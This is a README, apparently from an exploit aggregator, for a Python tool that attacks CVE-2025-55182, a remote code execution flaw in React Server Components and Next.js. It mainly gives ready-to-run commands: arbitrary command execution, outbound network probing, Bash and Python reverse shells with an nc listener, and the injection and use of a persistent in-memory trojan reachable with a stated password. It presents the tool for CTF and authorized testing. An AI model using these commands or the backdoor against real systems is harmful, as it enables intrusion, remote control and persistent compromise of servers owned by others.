Share
## https://sploitus.com/exploit?id=13AD79F1-9C02-53F4-99CD-8C9AA124B4E7
# React2Shell: CVE-2025-55182 – Comprehensive Vulnerability Scanner

**Author:** lamaper / BITs2Sys  
**Version:** 1.0.1  
**License:** MIT  

## 📝 Introduction to the Tool  
This tool is an automated penetration testing tool specifically designed for **CVE-2025-55182** (RCE caused by React Server Components / Next.js prototype chain pollution). It was developed for CTF competitions and authorized penetration testing projects. It integrates multiple functions such as vulnerability verification, outbound network detection, reverse shell execution, and memory Trojan injection.  

## 🚀 Core Features  
* **One-click command execution (`--cmd`)**: Utilizes the exception mechanism of `NEXT_REDIRECT` to accurately return the Base64-encoded command execution result.  
* **Outbound network detection (`--check-outbound`)**: Automatically tests the target machine’s ability to access DNS, HTTP, and ICMP, aiding in deciding the attack path.  
* **Interactive reverse shell (`--shell`)**: Supports two modes—Bash and Python3—with asynchronous execution to prevent HTTP requests from hanging.  
* **Persistent memory Trojan (`--inject-ms`)**: Injects a memory Trojan by manipulating the event dispatch mechanism of Node.js `http.Server`. No file residue is created, and persistent control is supported.  
* **Memory Trojan interaction interface (`--ms-cmd`)**: An independent interaction mode that allows commands to be executed directly after the Trojan is injected.  

## 🛠️ Installation and Dependencies  
The tool is developed in Python 3. Only the `requests` library needs to be installed.  
```bash
pip install requests
```

## 📖 Usage Guide  

### 0. Detecting if the vulnerability exists  
https://github.com/assetnote/react2shell-scanner is a useful detection tool.  

### 1. Basic Command Execution  
To obtain information about the target machine:  
```bash
python exploit.py --url http://target.com/ --cmd "id"
python exploit.py --url http://target.com/ --cmd "cat /flag"
```

### 2. Outbound Network Detection  
Before attempting to execute a reverse shell, confirm whether the target machine can connect to the external network:  
```bash
python exploit.py --url http://target.com/ --check-outbound
```

### 3. Reverse Shell Execution  
**Bash Mode**:  
```bash
# On the attacker machine, run the listening process: nc -lvnp 4444
python exploit.py --url http://target.com/ --shell bash --ip  --port 4444
```

**Python Mode**:  
```bash
python exploit.py --url http://target.com/ --shell python --ip  --port 4444
```

### 4. Memory Trojan Utilization (Persistent)  
**Injecting a memory Trojan**:  
```bash
python exploit.py --url http://target.com/ --inject-ms
```

**Executing commands through the memory Trojan** (After successful injection):  
```bash
python exploit.py --url http://target.com/ --ms-cmd "whoami"
```

*Note: The default injection path for the memory Trojan is `/?pass`. The `pwd` parameter is submitted via POST.*  

**Connecting via AntSword**:  
Connection password: pwd; Connection method: CMDLINUX  

## ⚠️ Disclaimer  
This tool is only used for security research, CTF competitions, and authorized penetration testing within legal boundaries. Its use for illegal attacks is strictly prohibited. All consequences arising from using this tool are the responsibility of the user.